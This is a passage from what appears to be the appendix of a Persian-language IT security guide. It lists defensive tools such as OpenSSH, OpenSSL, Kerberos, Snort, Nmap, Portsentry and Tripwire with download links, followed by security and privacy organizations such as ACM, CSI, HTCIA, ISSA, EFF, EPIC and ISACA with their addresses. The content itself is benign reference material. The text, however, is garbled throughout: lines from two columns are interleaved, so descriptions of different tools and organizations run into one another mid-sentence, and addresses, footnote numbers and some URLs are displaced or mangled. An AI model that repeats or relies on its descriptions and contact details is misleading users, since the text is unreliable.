ﺍﺳﺖ .ﻫﻤﭽﻨﻴﻦ ﺗﺤﺖ Windowsﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺁﺯﺍﺩ ﺯﻳـﺎﺩﻱ ﺑﺮﺍﻱ ﻳﺎﻓﺘﻦ ﻧﺴﺨﻪﻫﺎﻱ ﺍﻣﻀﺎﺷﺪﻩ ﻣﻮﺭﺩ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﺩﻫﻨﺪ.
ﺑﻌﻨﻮﺍﻥ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ SSHﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ ،ﻣﺎﻧﻨـﺪ ﺍﺑـﺰﺍﺭ
.PuTTYﭘﻴﺶ ﺍﺯ ﺍﻳﻨﻜﻪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ ﺷـﻮﻳﺪ ،ﺳـﺮﻭﻳﺲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻭ ﻣﻨﻈﻮﺭﻩ
telnetﺭﺍ ﻏﻴﺮﻓﻌﺎﻝ ﻧﻤﺎﻳﻴـﺪ ﻭ ﺍﮔـﺮ ﺑﺎﻳـﺪ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ ﺑـﻪ
Kerberos
ﺳﻴـ ـﺴﺘﻢ ﻣﺘـــﺼﻞ ﺷـــﻮﻳﺪ) OpenSSH ،ﻳـــﺎ ﺍﻧـــﻮﺍﻉ ﺩﻳﮕـــﺮ
ﻳﻚ ﺳﻴﺴﺘﻢ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﻣﻦ ﺗﺤﺖ ﺷـﺒﻜﻪ ﻛـﻪ ﺑـﺮ ﻣﺒﻨـﺎﻱ
ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ (SSHﺭﺍ ﻧﺼﺐ ﻭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﻧﻤﺎﻳﻴﺪ .ﻣﻲ ﺗﻮﺍﻧﻴـﺪ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻛﺎﺭ ﻣﻲﻛﻨﺪ .ﻣﺘﻦ ﺑﺮﻧﺎﻣـﻪ ﻭ ﻣﻘـﺎﻻﺕ
OpenSSHﺭﺍ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ:
ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺍﺯ ﻃﺮﻳﻖ ﻣﺆﺳﺴﻪ ﻓﻨـﺎﻭﺭﻱ ﻣﺎﺳﺎﭼﻮﺳـﺖ )ﻳـﺎ ﻫﻤـﺎﻥ
http://www.openssh.org
ﺩﺍﻧﺸﮕﺎﻩ (MITﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ .ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﻨﻈﻮﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑـﺎ
OpenSSL ﺁﺩﺭﺱ ﺯﻳﺮ ﻣﻜﺎﺗﺒﻪ ﻧﻤﺎﻳﻴﺪ:
٥١٠
ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﺁﺯﺍﺩ ﺑـﺮﺍﻱ ﭘﻴـﺎﺩﻩﺳـﺎﺯﻱ ﻻﻳـﺔ ﺳـﻮﻛﺖ ﺍﻣـﻦ MIT Software Center
W32-300
)ﻧﺴﺨﻪﻫﺎﻱ ۲ﻭ (۳ﻭ ﺍﻣﻨﻴﺖ ﻻﻳﺔ ﺍﻧﺘﻘﺎﻝ )ﻧـﺴﺨﺔ .(۱ﺍﻳﻦ ﻧﺮﻡﺍﻓـﺰﺍﺭ، 20 Carlton Street
ﻻ ﻣﻮﺭﺩﻛﺘﺎﺑﺨﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻠﻬﺎ ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ Cambridge, MA 02139
(617) 253-7686
ﺍﺳﺘﻔﺎﺩﺓ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺩﻳﮕﺮ )ﻣﺜﻞ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ﻭﺏ(
ﻗﺮﺍﺭ ﻣﻲ ﮔﻴﺮﺩ .ﻫﻤﭽﻨﻴﻦ ﻳﻚ ﺍﺑـﺰﺍﺭ ﺧـﻂ ﻓﺮﻣـﺎﻥ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ FTPﻧﺎﺷـﻨﺎﺱ ﺑـﺮﺍﻱ ﺍﻧﺘﻘـﺎﻝ ﻓﺎﻳـﻞ ﺩﺭ ﺍﻳﻨﺘﺮﻧـﺖ
ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻱ ﮔـﻮﺍﻫﻲﻫـﺎﻱ ﺭﻣـﺰﻱ ،٥١١ﮔـﻮﺍﻫﻲﻫـﺎ ،ﺍﻣـﻀﺎﻫﺎ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﻴﺪ:
ﺷﻤﺎﺭﻩﻫﺎﻱ ﺗﺼﺎﺩﻓﻲ ،ﻓﺮﺍﻫﻢ ﻣﻲﻛﻨﺪ OpenSSL .ﺭﺍ ﻣﻲﺗﻮﺍﻧﻴﺪ ftp://athena-dist.mit.edu/pub/kerberos
ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﺑﻴﺎﺑﻴﺪ:
Kerberosﺩﺭ ﺳﻴــــﺴﺘﻢﻋﺎﻣــــﻞ Windows 2000ﻭ
http://www.openssl.org
ﻭﻳﺮﺍﻳﺸﻬﺎﻱ ﺑﻌﺪ ﺍﺯ ﺁﻥ ﺟﺎﺳﺎﺯﻱ ﺷﺪﻩ ﺍﺳﺖ.
Snort
٥١٢
ﻳﻚ ﻧﺮﻡ ﺍﻓـﺰﺍﺭ ﺁﺯﺍﺩ ﻗﺪﺭﺗﻤﻨـﺪ ﺑـﺮﺍﻱ ﺩﻳـﺪﻩﺑـﺎﻧﻲ ﺑـﺴﺘﻪﻫـﺎ ﻭ Nmap
ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬـﺎﺟﻢﻳـﺎﺏ ﺍﺳـﺖ .ﻣﺠﻤﻮﻋـﻪ ﺿـﻮﺍﺑﻂ ﺳﻴـﺴﺘﻢ ﻳﻚ ﭘﻮﻳﺸﮕﺮ ﭘﻮﺭﺕ ﻛﻪ ﻫﻢ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺑﺮﺍﻱ ﻧﻔﻮﺫ ﻭ ﻫﻢ ﺭﺍﻫﺒﺮﺍﻥ
ﻣﻬﺎﺟﻢﻳﺎﺏ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﻪﺭﻭﺯﺭﺳﺎﻧﻲ ﻣﻲﺷـﻮﺩ ﻭ ﺁﻧـﺮﺍ ﻗـﺎﺩﺭ ﺑـﻪ ﺑﺮﺍﻱ ﺩﻓﺎﻉ ﺩﺭ ﺑﺮﺍﺑﺮ ﻧﻔﻮﺫ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻗﺎﺑﻠﻴﺖ ﺍﻧﺠﺎﻡ
ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴﻞ ﺑﻼﺩﺭﻧـﮓ ﺑـﺴﺘﻪﻫـﺎﻱ TCP/IPﻛـﻪ ﺗﺤـﺖ ﭘﻮﻳﺸﻬﺎﻱ ﮔﻮﻧـﺎﮔﻮﻥ ﺭﻭﻱ ﭘﻮﺭﺗﻬـﺎﻱ UDP ،TCPﻭ ICMP
ﻧﻈﺎﺭﺕ ﺩﺍﺭﺩ ،ﻭ ﻧﻴﺰ ﮔﺰﺍﺭﺵ ﺗﺮﺍﻓﻴﻚ ﻣﺸﻜﻮﻙ ﻣـﻲﻧﻤﺎﻳـﺪ .ﺍﻳـﻦ )ﺍﺯ ﺟﻤﻠﻪ ﭘﻮﻳﺸﻬﺎﻱ ﻣﺨﻔﻴﺎﻧﻪ ﻛﻪ ﻣﻌﻤﻮ ﹰ
ﻻ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺍﺯ ﺁﻥ ﺑـﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺍ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻴﺪ: ﺧﻮﺩ ﺑﻬﺮﻩ ﻣﻲﮔﻴﺮﻧﺪ( ،ﻭ ﻗﺎﺑﻠﻴﺖ ﭘﻴﭽﻴﺪﺓ ﺗـﺸﺨﻴﺺ ﺳﻴـﺴﺘﻢﻋﺎﻣﻠﻬـﺎ
http://www.snort.org )ﺷﺮﻛﺖ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﻩ ﻭ ﻭﻳﺮﺍﻳﺶ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ( ﺍﺯ ﺭﺍﻩ ﺩﻭﺭ ﺭﺍ ﺩﺍﺭﻧﺪ.
ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ: ﻣﺸﺨﺼﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﻭ ﺷﺎﺧﻪﻫﺎ ﺭﺍ ﺑﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺸﺎﺑﻪ ﻣﻮﺟـﻮﺩ ﺩﺭ
ftp://ftp.porcupine.org/pub/security/index.html ﻳﻚ ﭘﺎﻳﮕـﺎﻩ ﺩﺍﺩﻩ ﺑﺮﺭﺳـﻲ ﻣـﻲﻧﻤﺎﻳـﺪ ﻭ ﻓﺎﻳﻠﻬـﺎﻱ ﺍﺿـﺎﻓﻪﺷـﺪﻩ،
ftp://ftp.cerias.purdue.edu/pub/tools/unix/netu
tils/portmap/ ﻓﺎﻳﻠﻬﺎﻱ ﭘﺎﻙﺷﺪﻩ ،ﻭ ﻓﺎﻳﻠﻬﺎﻳﻲ ﻛﻪ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻧﻬـﺎ ﺗﻐﻴﻴـﺮ ﻛـﺮﺩﻩ
ﺑﺎﺷﻨﺪ ﺭﺍ ﮔﺰﺍﺭﺵ ﻣﻲﺩﻫﺪ .ﻃﻲ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺯﻣﺎﻧﻲ ﻣﻌﻴﻦ ﺑﺮﻧﺎﻣـﺔ
Portsentry Tripwireﺭﺍ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻭﺭﻳـﺪ .ﺩﺭ ﺍﻳﻨـﺼﻮﺭﺕ ﺑﺮﻧﺎﻣـﻪ ﺩﺭ ﻫـﺮ
ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺗﺪﺍﻓﻌﻲ ﺩﺭ ﻣﻘﺎﺑﻞ ﭘﻮﻳﺸﮕﺮﻫﺎﻱ ﭘـﻮﺭﺕ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺟﺮﺍﻱ ﺧﻮﺩ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺭﺍ ﺑﻪ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ ﻧﺸﺎﻥ ﻣﻲﺩﻫﺪ ﻭ ﺍﻳـﻦ
ﺍﺳـﺖ ﭘـﻴﺶ ﺍﺯ ﻳــﻚ ﺣﻤﻠـﻪ ﺁﻏـﺎﺯ ﺷــﻮﺩ Portsentry .ﺭﻭﻱ ﺍﻣﻜﺎﻥ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﺩ ﻛﻪ ﺧﺮﺍﺑﻴﻬﺎ ﺑﺴﺮﻋﺖ ﻛﺸﻒ ﻭ ﺍﻗـﺪﺍﻣﺎﺕ
ﭘﻮﺭﺗﻬﺎﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻧﺸﺪﺓ TCP/IPﺑﻪ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺍﻳﺴﺘﺪ ﻭ ﺯﻣـﺎﻧﻲ ﻛﻨﺘﺮﻟﻲ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺁﻧﻬﺎ ﺑﺴﺮﻋﺖ ﺁﻏﺎﺯ ﺷﻮﻧﺪ.
ﻛﻪ ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ﻗﺼﺪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻳـﻚ ﻳـﺎ ﭼﻨـﺪ ﭘـﻮﺭﺕ
ﺗﺤﺖ ﻧﻈـﺎﺭﺕ ﺭﺍ ﺩﺍﺭﻧـﺪ ،ﻭﺍﺭﺩ ﻋﻤـﻞ ﻣـﻲﺷـﻮﺩ .ﺍﻳـﻦ ﻋﻤﻠﻴـﺎﺕ ﻧﺴﺨﺔ ﺁﺯﺍﺩ Tripwireﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺍﺳﺖ:
ﻣﻲﺗﻮﺍﻧﺪ ﺷﺎﻣﻞ ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻧـﺎﻡ ﻣﻴﺰﺑـﺎﻥ ﭘﻮﻳـﺸﮕﺮ ﺑـﻪ ﻣـﺴﻴﺮ http://www.tripwire.com/ddownloads
ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ: ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﺯﻳﺮ ﻗﺎﺑﻞ ﺩﺭﻳﺎﻓﺖ ﺍﺳﺖ:
http://www.oit.ucsb.edu/~eta/swatch/ ftp://ftp.porcupine.org/pub/security/index.html
ftp://ftp.cerias.purdue.edu/pub/tools/unix/log ftp://ftp.cerias.purdue.edu/pub/tools/unix/sysu
utils/swatch/ tils/chrootuid/
Tcpwrapper Portmap
ﺳﻴﺴﺘﻤﻲ )ﻧﻮﺷـﺘﺔ ﻭﻳﺘـﺰ ﻭﻧﻤـﺎ( ﻛـﻪ ﺑﺎﻋـﺚ ﻣـﻲﺷـﻮﺩ ﺑﺘﻮﺍﻧﻴـﺪ ﺑـﺮ ﺧﺪﻣﺎﺕ ) portmapﻧﻮﺷﺘﺔ ﻭﻳﺘﺰ ﻭﻧﻤﺎ( ﺑﺮﻧﺎﻣﺔ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺑﺮﺍﻱ
ﺩﺭﺧﻮﺍﺳﺘﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ inetdﺑـﺮﺍﻱ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩ ﻣـﻲﺁﻳـﺪ ﺑﺮﻧﺎﻣﺔ portmapperﺷﺮﻛﺖ Sunﺍﺳﺖ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺩﺍﺭﺍﻱ
ﻧﻈﺎﺭﺕ ﻭ ﺁﻧﻬﺎ ﺭﺍ ﻏﺮﺑﺎﻝ ﻛﻨﻴﺪ .ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﻛﻨﺘﺮﻝ ﺩﺳﺘﺮﺳﻲ ﻭ ﻭﺭﻭﺩ ﺑﻪ ﺳﻴﺴﺘﻢ ﻣﻲﺑﺎﺷﺪ ﻛﻪ ﺩﺭ
portmapperﺷﺮﻛﺖ Sunﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻨﺪ .ﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺩﺭ
ﺑﺨﺶ ﺷﺸﻢ
1515 Broadway
ﺍﻳﻦ ﻣﺆﺳﺴﻪ ﺩﺭ ﺳﺎﻝ ۱۹۷۴ﺑﻪ ﻋﻨﻮﺍﻥ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﭼﻨﺪﻣﻨﻈﻮﺭﻩ
17th Floor
ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺍﻋﻀﺎﻱ ﺧـﻮﺩ ﺩﺭ ﺣﻔﺎﻇـﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﭘﺮﺩﺍﺯﺷـﻲ
New York, New York 10036-5701
ﺍﻃﻼﻋﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺗﺄﺳﻴﺲ ﺷﺪ CSI .ﺍﺯ ﺑﺮﮔﺰﺍﺭﻱ ﻛﺎﺭﮔﺎﻫﻬﺎ +1-212-869-7440
ﻭ ﻛﻨﻔﺮﺍﻧﺴﻬﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺣﻤﺎﻳـﺖ ﻣـﺎﻟﻲ ﻣـﻲﻛﻨـﺪ ،ﻳـﻚ ﻣﺠﻠـﺔ http://www.acm.org
520 American Society for Industrial Security 518 Association for Computing Machinery
521 Computer Security Institute 519 Special Interest Groups
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٩٠
٥٢٥
) HTCIAﺍﻧﺠﻤﻦ ﭘﻴﮕﺮﺩ ﺗﺨﻠﻔﺎﺕ ﻓﻨﺎﻭﺭﻱ ﭘﻴﺸﺮﻓﺘﻪ( ﺗﺤﻘﻴﻘﺎﺗﻲ ﻭ ﻳﻚ ﻧﺸﺮﻳﺔ ﺗﺨﺼﺼﻲ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﻣﻨﻴـﺖ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ
ﭼﺎﭖ ﻣﻲﺭﺳﺎﻧﺪ ،ﻭ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻣﻨﺒﻊ ﻣﻬﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺭ ﺯﻣﻴﻨـﺔ
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺣﺮﻓﻪﺍﻱ ﺑـﺮﺍﻱ ﺍﻓـﺮﺍﺩﻱ ﻛـﻪ ﻣـﺸﻐﻮﻝ ﺗﺤﻘﻴﻘـﺎﺕ ﺍﻣﻨﻴﺖ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﻣﻲﻧﻤﺎﻳﺪ .ﻣﺆﺳﺴﻪ ﺑﺮ ﺍﺳﺎﺱ ﺳـﻮﺩ ﻣﺘﻘﺎﺑـﻞ
ﭘﻠﻴﺴﻲ ﻭ ﭘﻴﮕﻴﺮﺩ ﺟﺮﺍﺋﻢ ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﭘﻴﺸﺮﻓﺘﻪ ﺍﺯ ﺟﻤﻠـﻪ ﺗﺨﻠﻔـﺎﺕ ﺧﺪﻣﺎﺕ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑﻪ ﺍﻋﻀﺎ ﻭ ﮔﺮﻭﻫﻬﺎﻱ ﺧﻮﺩ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫـﺪ ﻛـﻪ
ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻣــﻲﺑﺎﺷــﻨﺪ .ﺍﻳــﻦ ﺳــﺎﺯﻣﺎﻥ ﺩﺭ ﺁﻣﺮﻳﻜــﺎ ﻭ ﺑــﺴﻴﺎﺭﻱ ﺍﺯ ﻳﻚ ﻧﻤﻮﻧﺔ ﺁﻥ ﻋﺒﺎﺭﺕ ﺍﺳﺖ ﺍﺯ ﺍﻧﺘﺸﺎﺭ ﺳﺎﻟﻨﺎﻣﻪ ﺭﺍﻫﻨﻤـﺎﻱ ﺍﻣﻨﻴـﺖ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﺷﻌﺒﺎﺗﻲ ﺩﺍﺭﺩ ﻭ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺍﺯ ﻃﺮﻳﻖ ﭘﺎﻳﮕـﺎﻩ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧﺮﻳﺪﺍﺭﺍﻥ ٥٢٢ﻛﻪ ﻣﻨﺎﺑﻌﻲ ﺑـﺮﺍﻱ ﻧـﺮﻡﺍﻓـﺰﺍﺭ ،ﻣﻘـﺎﻻﺕ ،ﻭ
ﻭﺏ ،ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻳﺎ ﺗﻠﻔﻦ ﻗﺎﺑﻞ ﺣﺼﻮﻝ ﺍﺳﺖ. ﺍﺭﺍﺋﻪ ﻣﺸﺎﻭﺭﺓ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﻓﻬﺮﺳﺖ ﻛﺮﺩﻩ ﺍﺳﺖ.
HTCIA, Inc. Computer Security Institute
1474 Freeman Dr. 600 Harrison Street
Amisville, VA 20106
San Francisco, CA 94107
+1-540-937-5019
http://htcia.org +1-415-947-6320
http://www.gocsi.com
٥٢٦
) ISSAﺍﻧﺠﻤﻦ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ( ٥٢٣
) EFFﺑﻨﻴﺎﺩ ﭘﻴﺸﺮﻭﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(
ﻳــﻚ ﺳــﺎﺯﻣﺎﻥ ﺑــﻴﻦﺍﻟﻤﻠﻠــﻲ ﺍﺯ ﻣﺘﺨﺼــﺼﻴﻦ ﻭ ﻭﻛــﻼﻱ ﺍﻣﻨﻴــﺖ ﺍﺯ ﻣﺴﺎﺋﻞ ﻣﺮﺗﺒﻂ ﺑﺎ ﺁﺯﺍﺩﻳﻬﺎﻱ ﻣﺪﻧﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺣﻤﺎﻳﺖ ﻗـﺎﻧﻮﻧﻲ
ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺍﺯ ﺟﻠﺴﺎﺕ ﺁﻣﻮﺯﺷﻲ ،ﺍﻧﺘﺸﺎﺭ ﻧﺸﺮﻳﺎﺕ ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﻣﻲﻛﻨﺪ ﻭ ﺍﮔﺮﭼﻪ ﺍﻫﺪﺍﻑ ﺁﻥ ﺑﺴﻴﺎﺭ ﻓﺮﺍﺗﺮ ﺍﺯ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ،
ﺗﻌﺎﻣﻞ ﺭﻭ ﺩﺭ ﺭﻭ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨـﺪ ﺗـﺎ ﺳـﻄﺢ ﺩﺍﻧـﺶ ،ﻣﻬـﺎﺭﺕ ﻭ ﺍﻣﺎ ﺩﺍﺭﺍﻱ ﻳﻚ ﺑﺎﻳﮕﺎﻧﻲ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﺯ ﻣﺴﺘﻨﺪﺍﺕ ﻣﺮﺗﺒﻂ ﺑﺎ ﺍﻣﻨﻴﺖ
ﺗﺨﺼﺺ ﺍﻋﻀﺎﻱ ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ .ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﻋـﻼﻭﻩ ﺑـﺮ ﻭ ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﺳﺖ.
ﺍﻧﺘﺸﺎﺭ ﻧـﺸﺮﻳﻪ ،ﺍﺯ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎ ﻭ ﻛﺎﺭﮔﺎﻫﻬـﺎﻱ ﺍﻳـﻦ ﺣﻴﻄـﻪ ﻧﻴـﺰ
ﺣﻤﺎﻳﺖ ﻣﺎﻟﻲ ﺑﻌﻤﻞ ﻣﻲﺁﻭﺭﺩ؛ ﻭ ﺩﺭ ﺣـﺎﻝ ﺣﺎﺿـﺮ ﺷـﻌﺒﺎﺕ ﺁﻥ ﺩﺭ Electronic Frontier Foundation
454 Shotwell Street
ﺳﺮﺍﺳﺮ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﻭ ﺟﻬﺎﻥ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ. San Francisco, CA 94110-1914
+1-415-436-9333
ISSA Headquarters http://www.eff.org/
7044 S. 13th Street
Oak Creek, WI 53154
+1-414-768-8000 ٥٢٤
+1-800-370-ISSA ) EPICﻣﺮﻛﺰ ﺍﻃﻼﻋﺎﺕ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ(
http://www.issa.org
ﻳﻚ ﻣﺮﻛﺰ ﺗﺤﻘﻴﻘﺎﺕ ﻋﻤﻮﻣﻲ ﺍﺳﺖ ﻛـﻪ ﻣﻮﺿـﻮﻋﺎﺕ ﻣـﺮﺗﺒﻂ ﺑـﺎ
٥٢٧
) ISACAﺍﻧﺠﻤﻦ ﻣﻤﻴﺰﻱ ﻭ ﻛﻨﺘﺮﻝ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋﺎﺗﻲ( ﻣﺤﺮﻣﺎﻧﮕﻲ ﺍﻃﻼﻋﺎﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺭﺍ ﻣﻮﺭﺩ ﻣﻄﺎﻟﻌﻪ ﻗﺮﺍﺭ ﻣﻲﺩﻫﺪ.
ﺍﻳﻦ ﻣﺮﻛﺰ ﺍﺯ ﻣﺴﺎﺋﻞ ﺣﺮﻳﻢ ﺧـﺼﻮﺻﻲ ﻭ ﺁﺯﺍﺩﻱ ﻣـﺪﻧﻲ ﺣﻤﺎﻳـﺖ
ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﺍﺯ ﻣﺘﺨﺼـﺼﻴﻦ ﻭ ﻭﻛـﻼﻱ ﻣـﺸﺎﻭﺭ ﺩﺭ
ﻗﺎﻧﻮﻧﻲ ﻣﻲﻛﻨﺪ.
ﺣﻮﺯﺓ ﻣـﺪﻳﺮﻳﺖ ﻭ ﻣﻤﻴـﺰﻱ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ ﻛـﻪ ﺍﺯ ﺟﻠـﺴﺎﺕ
ﺁﻣﻮﺯﺷﻲ ،ﺍﻧﺘﺸﺎﺭ ﻧﺸﺮﻳﺎﺕ ،ﺍﻋﻄﺎﻱ ﮔﻮﺍﻫﻲﻧﺎﻣﻪﻫﺎﻱ ﺗﺨﺼﺼﻲ ﺑﻪ 1718 Connecticut Avenue
ﻛﺎﺭﺷﻨﺎﺳــﺎﻥ ﻭ ﻣﺘﺨﺼــﺼﻴﻦ ،ﻭ ﻓﺮﺻــﺘﻬﺎﻱ ﺗﻌﺎﻣــﻞ ﺭﻭ ﺩﺭ ﺭﻭ NW, Suite 200
Washington, DC 20009
ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ ﺗﺎ ﺳﻄﺢ ﺩﺍﻧﺶ ،ﻣﻬـﺎﺭﺕ ﻭ ﺗﺨـﺼﺺ ﺍﻋـﻀﺎﻱ +1-202-483-1140
ﺧﻮﺩ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ .ﺍﻳﻦ ﺍﻧﺠﻤﻦ ﻋﻼﻭﻩ ﺑـﺮ ﺍﻧﺘـﺸﺎﺭ ﻧـﺸﺮﻳﻪ ،ﺍﺯ info@epic.org
ﺗﺤﻘﻴﻘﺎﺕ ،ﻛﻨﻔﺮﺍﻧﺴﻬﺎ ﻭ ﻛﺎﺭﮔﺎﻫﻬﺎﻱ ﻣﺮﺗﺒﻂ ﻧﻴـﺰ ﺣﻤﺎﻳـﺖ ﻣـﺎﻟﻲ http://www.epic.org
525 High Technology Crimes Investigation Association 522 Computer Security Buyer’s Guide
526 Information Systems Security Association 523 Electronic Frontier Foundation
527 Information Systems Audit and Control Association 524 Electronic Privacy Information Center
٤٩١ ﭘﻴﻮﺳﺘﻬﺎ
